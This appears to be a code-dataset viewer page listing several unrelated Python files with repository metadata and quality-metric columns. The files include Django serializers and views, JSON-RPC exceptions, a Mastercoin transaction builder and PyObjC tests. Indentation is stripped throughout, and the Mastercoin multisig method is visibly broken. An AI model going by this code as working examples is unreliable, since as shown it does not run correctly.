self.printChar=self.printKey["value"]
self.printValue=BinaryOperation_yjcL.getExpressionValue(printWhat)
print(self)
# self.children.append(printedClass)
def __repr__(self):
return "PrintSomething 屑%s >> %s"%(self.printChar,self.printValue)
| 28.644444 | 74 | 0.730023 | 150 | 1,289 | 6.1 | 0.446667 | 0.084153 | 0.081967 | 0.104918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011215 | 0.169899 | 1,289 | 44 | 75 | 29.295455 | 0.843925 | 0.169899 | 0 | 0 | 0 | 0 | 0.044423 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.391304 | 0.043478 | 0.608696 | 0.347826 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
154912b6e9083d1050a38290e0eeb3b4863c88a3 | 924 | py | Python | students/K33402/Khoroshkeeva_Ksenia/LR3/locations/serializers.py | KseniaKhoroshkeeva/ITMO_ICT_WebDevelopment_2021-2022 | 59cda23fcd82f031dc1504d7f5abdae9e1f458c5 | [
"MIT"
] | null | null | null | students/K33402/Khoroshkeeva_Ksenia/LR3/locations/serializers.py | KseniaKhoroshkeeva/ITMO_ICT_WebDevelopment_2021-2022 | 59cda23fcd82f031dc1504d7f5abdae9e1f458c5 | [
"MIT"
] | null | null | null | students/K33402/Khoroshkeeva_Ksenia/LR3/locations/serializers.py | KseniaKhoroshkeeva/ITMO_ICT_WebDevelopment_2021-2022 | 59cda23fcd82f031dc1504d7f5abdae9e1f458c5 | [
"MIT"
] | null | null | null | from rest_framework import serializers
from .models import City, Country, UserChoice
class CitySerializer(serializers.ModelSerializer):
"""Сериалайзер для городов"""
class Meta:
model = City
fields = '__all__'
class CountrySerializer(serializers.ModelSerializer):
"""Сериалайзер для стран"""
class Meta:
model = Country
fields = '__all__'
cities = CitySerializer(many=True)
class UserChoiceWriteSerializer(serializers.ModelSerializer):
"""Сериалайзер для выбранных городов (для записи)"""
class Meta:
model = UserChoice
fields = '__all__'
user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class UserChoiceReadSerializer(serializers.ModelSerializer):
"""Сериалайзер для выбранных городов (для записи)"""
class Meta:
model = UserChoice
fields = ['id', 'city']
city = CitySerializer()
| 24.972973 | 76 | 0.692641 | 82 | 924 | 7.646341 | 0.402439 | 0.165869 | 0.236045 | 0.255183 | 0.30303 | 0.30303 | 0.30303 | 0.30303 | 0.30303 | 0.30303 | 0 | 0 | 0.213203 | 924 | 36 | 77 | 25.666667 | 0.862448 | 0.150433 | 0 | 0.428571 | 0 | 0 | 0.03534 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.095238 | 0 | 0.619048 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
159d46301959d5e5d7ecb4ef6dafc371a4191b43 | 2,584 | py | Python | pyjsonrpc/src/jsonrpc/jsonrpcexceptions.py | mlunnay/nds_rpc | f09d707b660fa100aa378bc119ff33fe04107966 | [
"MIT"
] | null | null | null | pyjsonrpc/src/jsonrpc/jsonrpcexceptions.py | mlunnay/nds_rpc | f09d707b660fa100aa378bc119ff33fe04107966 | [
"MIT"
] | null | null | null | pyjsonrpc/src/jsonrpc/jsonrpcexceptions.py | mlunnay/nds_rpc | f09d707b660fa100aa378bc119ff33fe04107966 | [
"MIT"
] | null | null | null | # Copyright (c) 2008, Michael Lunnay <mlunnay@gmail.com.au>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Custom exception heirachy for jsonrpc."""
class JSONRPCError(Exception):
def __init__(self, code, msg, data=None):
self.code = code
self.message = msg
self.data = data
def __str__(self):
out = "JSON-RPCError(%d:%s)" % (self.code, self.message)
if self.data:
out += ": %s" % str(self.data)
return out
def json_equivalent(self):
"""return a json encodable object that represents this Exception."""
obj = {'code': self.code, 'message': self.message}
if self.data != None:
obj['data'] = self.data
return obj
class ParseError(JSONRPCError):
def __init__(self, data=None):
JSONRPCError.__init__(self, -32700, "Parse error", data)
class InvalidRequestError(JSONRPCError):
def __init__(self, data=None):
JSONRPCError.__init__(self, -32600, "Invalid Request", data)
class MethodNotFoundError(JSONRPCError):
def __init__(self, data=None):
JSONRPCError.__init__(self, -32601, "Method not found", data)
class InvalidParametersError(JSONRPCError):
def __init__(self, data=None):
JSONRPCError.__init__(self, -32602, "Invalid params", data)
class InternalError(JSONRPCError):
def __init__(self, data=None):
JSONRPCError.__init__(self, -32603, "Internal error", data)
class ApplicationError(JSONRPCError):
def __init__(self, data=None):
JSONRPCError.__init__(self, -32000, "Application error", data)
class JSONRPCAssertionError(JSONRPCError):
def __init__(self, data=None):
JSONRPCError.__init__(self, -32001, "Assertion error", data)
class JSONRPCNotImplementedError(JSONRPCError):
def __init__(self, data=None):
JSONRPCError.__init__(self, -32002, "Not Implemented", data)
| 37.449275 | 76 | 0.699303 | 318 | 2,584 | 5.45283 | 0.402516 | 0.078431 | 0.057093 | 0.106113 | 0.259516 | 0.235294 | 0.235294 | 0.235294 | 0.235294 | 0 | 0 | 0.021297 | 0.200464 | 2,584 | 68 | 77 | 38 | 0.818006 | 0.331269 | 0 | 0.205128 | 0 | 0 | 0.091496 | 0 | 0 | 0 | 0 | 0 | 0.051282 | 1 | 0.282051 | false | 0 | 0 | 0 | 0.564103 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
eca1b2aefb845b5b3dae6a6f9e1c2edb238cdd55 | 3,207 | py | Python | message.py | maraoz/pymastercoin | 040b5297916296567751b992a231877aee940514 | [
"Apache-2.0"
] | 4 | 2017-12-02T10:20:56.000Z | 2021-12-04T06:23:03.000Z | message.py | maraoz/pymastercoin | 040b5297916296567751b992a231877aee940514 | [
"Apache-2.0"
] | 1 | 2016-11-01T03:29:09.000Z | 2016-11-01T03:29:09.000Z | message.py | maraoz/pymastercoin | 040b5297916296567751b992a231877aee940514 | [
"Apache-2.0"
] | 3 | 2016-08-22T02:47:01.000Z | 2019-11-15T04:57:48.000Z | """Mastercoin message models"""
from struct import pack
from embed import recover_bytes_from_address, embed_in_address, TESTNET
EXODUS_ADDRESS = "1EXoDusjGwvnjZUyKkxZ4UHEf77z6A5S4P" if not TESTNET else "mx4gSH1wfPdV7c9FNGxZLMGh1K4x43CVfT"
DACOINMINISTERS_IN_MSC = 100000000
EPSILON = float(0.00006)
CURR_ID_MASTERCOIN = 1
CURR_ID_TESTCOIN = 2
CURRENCIES = [None, CURR_ID_MASTERCOIN, CURR_ID_TESTCOIN]
CURRENCY_NAME = [None, "MasterCoin", "TestCoin"]
TX_TYPE_SIMPLESEND = 0
def build_data_simple_send(recipient, currency_id, ammount):
recipient_seq = ord(recover_bytes_from_address(recipient)[1])
data_seq = (recipient_seq - 1) % 256
data_bytes = pack('!HIIQH', data_seq, TX_TYPE_SIMPLESEND, currency_id, ammount, 0)
return data_bytes
class MastercoinMessage():
"""Generic Mastercoin Message."""
@classmethod
def simple_send(cls, sender, recipient, currency_id=CURR_ID_TESTCOIN, ammount=100000000):
return cls(sender, recipient, build_data_simple_send(recipient, currency_id, ammount))
def __init__(self, sender, reference, data):
self.sender = sender
self.reference = reference
self.data = data
def broadcast(self, bitcoin):
"""Subclasses should use the bitcoin-rpc client to broadcast the Mastercoin message"""
raise NotImplementedError()
class MastercoinAddressMessage(MastercoinMessage):
"""Mastercoin message implementation using bitcoin address data encoding"""
def broadcast(self, bitcoin):
print "Broadcasting MasterCoin message. Raw data: %s" % self.data.encode("hex")
data_address = embed_in_address(self.data)
recover_bytes_from_address(data_address) # check validity
txs = {
EXODUS_ADDRESS: EPSILON,
self.reference: EPSILON,
data_address: EPSILON # TODO: take into account data larger than 20 bytes
}
account = bitcoin.getaccount(self.sender)
print "About to send the following transactions, are you sure?"
print "\tExodus:\t\t%s -> %s" % (EXODUS_ADDRESS, EPSILON)
print "\tReference:\t%s -> %s" % (self.reference, EPSILON)
print "\tData:\t\t%s -> %s" % (data_address, EPSILON)
print "Press ENTER to continue or anything else to cancel."
if raw_input() == "":
data = bitcoin.sendmany(account, txs)
return data
class MastercoinMultisigMessage(MastercoinMessage):
"""Mastercoin message implementation using multisig data encoding"""
def broadcast(self, bitcoin):
pubkeys = [
"0491bba2510912a5bd37da1fb5b1673010e43d2c6d812c514e91bfa9f2eb129e1c183329db55bd868e209aac2fbc02cb33d98fe74bf23f0c235d6126b1d8334f86",
"04865c40293a680cb9c020e7b1e106d8c1916d3cef99aa431a56d253e69256dac09ef122b1a986818a7cb624532f062c1d1f8722084861c5c3291ccffef4ec6874",
"048d2455d2403e08708fc1f556002f1b6cd83f992d085097f9974ab08a28838f07896fbab08f39495e15fa6fad6edbfb1e754e35fa1c7844c41f322a1863d46213"
]
print bitcoin.createmultisig(2, )["address"]
| 38.638554 | 145 | 0.695978 | 307 | 3,207 | 7.078176 | 0.37785 | 0.04694 | 0.022089 | 0.031753 | 0.122411 | 0.073631 | 0.041417 | 0.041417 | 0 | 0 | 0 | 0.123343 | 0.223885 | 3,207 | 82 | 146 | 39.109756 | 0.749699 | 0.019956 | 0 | 0.057692 | 0 | 0 | 0.247629 | 0.160871 | 0 | 0 | 0 | 0.012195 | 0 | 0 | null | null | 0 | 0.038462 | null | null | 0.134615 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
eca2685c6a2dc613803d913695bf93b0bd5ab912 | 1,998 | py | Python | PyObjCTest/test_nsstackview.py | linuxfood/pyobjc-framework-Cocoa-test | 3475890f165ab26a740f13d5afe4c62b4423a140 | [
"MIT"
] | null | null | null | PyObjCTest/test_nsstackview.py | linuxfood/pyobjc-framework-Cocoa-test | 3475890f165ab26a740f13d5afe4c62b4423a140 | [
"MIT"
] | null | null | null | PyObjCTest/test_nsstackview.py | linuxfood/pyobjc-framework-Cocoa-test | 3475890f165ab26a740f13d5afe4c62b4423a140 | [
"MIT"
] | null | null | null | import AppKit
from PyObjCTools.TestSupport import TestCase, min_os_level, min_sdk_level
import objc
class TestNSStackView(TestCase):
def testConstants(self):
self.assertEqual(AppKit.NSUserInterfaceLayoutOrientationHorizontal, 0)
self.assertEqual(AppKit.NSUserInterfaceLayoutOrientationVertical, 1)
self.assertEqual(AppKit.NSStackViewGravityTop, 1)
self.assertEqual(AppKit.NSStackViewGravityLeading, 1)
self.assertEqual(AppKit.NSStackViewGravityCenter, 2)
self.assertEqual(AppKit.NSStackViewGravityBottom, 3)
self.assertEqual(AppKit.NSStackViewGravityTrailing, 3)
self.assertEqual(AppKit.NSStackViewVisibilityPriorityMustHold, 1000.0)
self.assertEqual(
AppKit.NSStackViewVisibilityPriorityDetachOnlyIfNecessary, 900.0
)
self.assertEqual(AppKit.NSStackViewVisibilityPriorityNotVisible, 0.0)
self.assertIsInstance(AppKit.NSStackViewSpacingUseDefault, float)
self.assertEqual(AppKit.NSStackViewSpacingUseDefault, objc._FLT_MAX)
self.assertEqual(AppKit.NSStackViewDistributionGravityAreas, -1)
self.assertEqual(AppKit.NSStackViewDistributionFill, 0)
self.assertEqual(AppKit.NSStackViewDistributionFillEqually, 1)
self.assertEqual(AppKit.NSStackViewDistributionFillProportionally, 2)
self.assertEqual(AppKit.NSStackViewDistributionEqualSpacing, 3)
self.assertEqual(AppKit.NSStackViewDistributionEqualCentering, 4)
@min_os_level("10.9")
def testMethods(self):
self.assertResultIsBOOL(AppKit.NSStackView.hasEqualSpacing)
self.assertArgIsBOOL(AppKit.NSStackView.setHasEqualSpacing_, 0)
@min_os_level("10.11")
def testMethods10_11(self):
self.assertResultIsBOOL(AppKit.NSStackView.detachesHiddenViews)
self.assertArgIsBOOL(AppKit.NSStackView.setDetachesHiddenViews_, 0)
@min_sdk_level("10.10")
def testProtocolObjects(self):
objc.protocolNamed("NSStackViewDelegate")
| 43.434783 | 78 | 0.766266 | 166 | 1,998 | 9.13253 | 0.361446 | 0.168206 | 0.235488 | 0.072559 | 0.056728 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024275 | 0.154655 | 1,998 | 45 | 79 | 44.4 | 0.873298 | 0 | 0 | 0 | 0 | 0 | 0.016517 | 0 | 0 | 0 | 0 | 0 | 0.611111 | 1 | 0.111111 | false | 0 | 0.083333 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
eca5709f5e7ffcbdbcd360e836ee55a3dd0e9b17 | 879 | py | Python | sports/views.py | ahmadabudames/Django-X | d19d7aa996c64f54cabcc08faa42ffe3734dca08 | [
"MIT"
] | null | null | null | sports/views.py | ahmadabudames/Django-X | d19d7aa996c64f54cabcc08faa42ffe3734dca08 | [
"MIT"
] | null | null | null | sports/views.py | ahmadabudames/Django-X | d19d7aa996c64f54cabcc08faa42ffe3734dca08 | [
"MIT"
] | null | null | null | from django.views.generic import ListView,CreateView,DetailView,UpdateView,DeleteView
from django.urls import reverse_lazy
from .models import sports
# Create your views here.
class sportsListView(ListView):
model= sports
template_name = "sports_list.html"
context_object_name='sports'
class sportsDetailView(DetailView):
model=sports
template_name='sports_detail.html'
class sportsCreateView(CreateView):
model= sports
template_name='sports_create.html'
fields=['title_field' ,'purchaser_field','description_field']
success_url='/'
class sportsUpdateView(UpdateView):
model=sports
template_name='sports_update.html'
fields=['title_field' ,'purchaser_field','description_field']
class sportsDeleteView(DeleteView):
model=sports
template_name='sports_delete.html'
success_url= reverse_lazy('sports_list')
| 25.114286 | 85 | 0.763367 | 100 | 879 | 6.48 | 0.41 | 0.092593 | 0.146605 | 0.177469 | 0.378086 | 0.154321 | 0.154321 | 0.154321 | 0 | 0 | 0 | 0 | 0.141069 | 879 | 34 | 86 | 25.852941 | 0.858278 | 0.026166 | 0 | 0.304348 | 0 | 0 | 0.224824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.130435 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
ecbcd51cc3d56621aa8dfe258b5f07bc950132db | 797 | py | Python | ie/BHO/tests/runtests.py | penciltim/selenium-ice | 58af79730063b28824b904f6547594b494952070 | [
"Apache-2.0"
] | null | null | null | ie/BHO/tests/runtests.py | penciltim/selenium-ice | 58af79730063b28824b904f6547594b494952070 | [
"Apache-2.0"
] | null | null | null | ie/BHO/tests/runtests.py | penciltim/selenium-ice | 58af79730063b28824b904f6547594b494952070 | [
"Apache-2.0"
] | null | null | null | import sys
sys.path.append("system")
# TODO: refactor to add support for running unit tests.
if __name__ == '__main__':
if (len(sys.argv) == 2) and (sys.argv[1] == 'system'):
print '\nIce Tester'
print '----------------------------------------------------------------------\n'
import doctest, unittest
test_suite_type = sys.argv[1]
if test_suite_type in ['system']:
print '** Running system tests - system_test.txt'
suite = doctest.DocFileSuite('system/system_test.txt', optionflags=doctest.ELLIPSIS)
unittest.TextTestRunner().run(suite)
else:
print """
Ice Tester
Usage:
When run as a script, testing options are available:
$ python runtests.py [system]
"""
| 30.653846 | 95 | 0.543287 | 87 | 797 | 4.816092 | 0.597701 | 0.050119 | 0.038186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005111 | 0.263488 | 797 | 25 | 96 | 31.88 | 0.708688 | 0.066499 | 0 | 0 | 0 | 0 | 0.417015 | 0.131102 | 0 | 0 | 0 | 0.04 | 0 | 0 | null | null | 0 | 0.105263 | null | null | 0.210526 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.